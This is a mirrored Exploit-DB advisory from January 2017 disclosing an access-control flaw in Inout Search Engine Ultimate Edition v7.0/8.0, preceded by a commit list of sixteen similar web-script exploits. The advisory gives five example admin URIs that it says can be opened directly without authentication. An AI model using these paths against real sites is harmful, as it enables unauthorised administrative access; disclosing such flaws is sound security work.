exploit-db-mirror/platforms/php/webapps/41049.txt
Offensive Security a577caaebb DB: 2017-01-15
16 new exploits

My Private Tutor Website Script - Authentication Bypass
Hindu Matrimonial Script - Authentication Bypass
Just Dial Marketplace Script - Authentication Bypass
Entrepreneur Matrimonial Script - Authentication Bypass
Open Source Real-Estate Script - SQL Injection
Inout StickBoard 1.0 Script - Improper Access Restrictions
Inout Search Engine Ultimate Edition 7.0/8.0 Script - Improper Access Restrictions
Inout Webmail Ultimate Edition 4.0 Script - Improper Access Restrictions
Inout SmartDeal 1.0 Script - Improper Access Restrictions
Inout QuerySpace 1.0 Script - Improper Access Restrictions
Inout CareerLamp 1.0 Script - Improper Access Restrictions
Inout SocialTiles 2.0 Script - Improper Access Restrictions
Inout Celebrities 1.0 Script - Improper Access Restrictions
Education Website Script - Authentication Bypass
Professional Service Booking Script - SQL Injection
Courier Business Website Script - Authentication Bypass
2017-01-15 05:01:17 +00:00

21 lines
No EOL
883 B
Text
Executable file

# # # # #
# Vulnerability: Security Bypass
# Date: 13.01.2017
# Vendor Homepage: http://www.inoutscripts.com/
# Script Name: Inout Search Engine Ultimate Edition Script
# Script Version: v7.0, v8.0
# Script Buy Now: http://www.inoutscripts.com/demo/inout-search-engine/demo/
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Direct entrance..
# An attacker can exploit this issue via a browser.
# The following example URIs are available:
# http://localhost/[PATH]/admin/index.php?page=engine/manage_suggestion
# http://localhost/[PATH]/admin/index.php?page=databaseengine/managesettings
# http://localhost/[PATH]/admin/index.php?page=seasonallogo/add
# http://localhost/[PATH]/admin/index.php?page=seasonallogo/manage
# http://localhost/[PATH]/admin/index.php?page=seasonallogo/add
# Vs.......
# # # # #